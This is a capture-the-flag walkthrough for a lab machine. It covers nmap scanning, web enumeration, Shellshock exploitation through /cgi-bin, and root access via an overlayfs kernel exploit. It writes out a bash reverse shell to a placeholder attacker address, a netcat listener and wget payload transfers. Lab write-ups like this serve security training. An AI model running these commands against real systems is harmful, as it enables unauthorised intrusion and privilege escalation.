Nmap
Starting off with an Nmap scan:
nmap -sC -sV -vv <MACHINE-IP>
We get 2 open ports:-
- 22 - ssh
- 80 - http
Getting the user flag
First look at the website does not show anything interesting, neither on the webpage nor in the source code.
Checking the robots.txt file also yields nothing..
So it's time to enumerate the website using both ffuf and dirb.
ffuf leads us to two interesting pages:-
- /backup which contains an ssh key
- /secret which again has nothing interesting
On the other hand, dirb shows us /cgi-bin.
Now along with the hints from the machine page and the turtle references, this made me think of the shellshock exploit.
To use shellshock, I found this GitHub repository which has an exploit written in Python.
After gaining initial access, we can get a reverse shell using a bash reverse shell from pentestmonkey and netcat.
On your attack machine, run:-
nc -lvnp <PORT>
On the target machine, run:-
/bin/bash -i >& /dev/tcp/ATTACKER-IP/PORT 0>&1
And again we get a more stable shell as www-data, and fortunately we can access the user flag in /home/ryan.
Getting the root flag
In order to discover the privilege escalation vector, you can either take the manual route or the automated route.
The automated way to do it is to setup a Python http server on your attack machine:-
python3 -m http.server <PORT>
And use wget to get LINPEAS onto the target machine from your machine.
Before running LINPEAS ensure it can be executed:-
chmod 777 linpeas.sh
And then run it:-
./linpeas.sh
As you can see, LINPEAS suggests a few exploits for us which target older kernel versions.
The manual way of discovering this would be to use uname to find the version:-
www-data@ubuntu:/tmp$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
And look for an exploit online.
So, after settling on one of the possible exploits (I used the overlayfs exploit), you need to store it on your machine, and again use a Python http server and wget to transfer it to the target.
After that, we get an error trying to compile the C file due to an issue with the $PATH variable on the machine, but that can easily be solved by running:-
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
After the C file is compiled, we run the compiled file and voila.. we are root!
